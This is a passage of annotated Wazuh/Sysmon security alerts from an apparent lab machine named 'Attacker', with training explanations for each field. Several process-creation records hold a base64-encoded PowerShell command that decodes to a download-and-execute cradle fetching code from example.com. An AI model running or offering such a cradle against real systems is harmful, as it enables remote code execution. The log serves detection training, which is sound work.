rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1046613 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:59.5779531Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282382 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:59.551
ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00}
ProcessId: 2176
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_24a1orhe.2h5.ps1
CreationUtcTime: 2025-04-24 22:35:59.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:59.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc9-680a-b70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2176 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_24a1orhe.2h5.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:59.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1049378 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:01.8631189Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282423 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:00.700
ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00}
ProcessId: 12264
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00}
ParentProcessId: 2176
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:00.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd0-680a-c60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12264 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2176 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1057445 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:02.0618898Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282424 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:02.054
ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00}
ProcessId: 12264
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awmsnad4.ya2.ps1
CreationUtcTime: 2025-04-24 22:36:02.054
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:02.054 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd0-680a-c60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12264 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awmsnad4.ya2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:02.054 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1060214 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:03.6012258Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282438 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:03.520
ProcessGuid: {94294ddc-bcd3-680a-ca0a-000000000e00}
ProcessId: 13664
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00}
ParentProcessId: 2332
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:03.520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd3-680a-ca0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1065269 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:04.4484774Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282461 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:03.117
ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00}
ProcessId: 11368
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00}
ParentProcessId: 12264
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:03.117 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd3-680a-c80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
